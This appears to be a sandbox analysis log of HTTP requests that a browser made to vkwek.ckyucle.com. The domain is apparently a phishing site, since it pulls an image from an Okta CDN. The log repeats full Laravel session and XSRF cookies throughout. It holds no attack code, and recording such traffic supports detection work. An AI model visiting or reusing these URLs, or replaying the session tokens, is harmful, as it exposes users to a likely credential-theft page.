XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /56NViOjdyBE66K4aemhQsnnijWU2q89KCdOOZ89106 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /mnV1lfGeFEBrSZF3tuYYejMClYOTm2XI5H6CdAfkleMiUWyqFdfMgv4x5mkyLwx220 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /ijGLf8KcAmo8F8uFMIwMKt5jWtydfJOdOqrh5153ZvUBo56RjXXwgHIOxu3KbwiSDyz230 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /uvhQlfoMbJ4XJRFtu2qrnZlpt9TrWXuaMNtQnfO12130 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /mnV1lfGeFEBrSZF3tuYYejMClYOTm2XI5H6CdAfkleMiUWyqFdfMgv4x5mkyLwx220 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /qr6FfLhLZ5QwaGe5HJsDHUaandv4RUef6Ia8VBkiV1U467140 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /kldibCibzXsTOdNtNAZcyznJMPZFnrycjnb52eIM56170 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /mnP7Z0RTacSIM9CxKvK5WayGyklgNKAsEypvOzHpfU2cP90150 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /opQX1gSU09O17E3k10USpNWJby3griWtsKreijbClabV2GbvNaQkTef200 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /wxygRZbM3kOCvEcFjIDlEKamnOMWqU6ryQDaTnQ90180 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /ijGLf8KcAmo8F8uFMIwMKt5jWtydfJOdOqrh5153ZvUBo56RjXXwgHIOxu3KbwiSDyz230 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /opQX1gSU09O17E3k10USpNWJby3griWtsKreijbClabV2GbvNaQkTef200 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 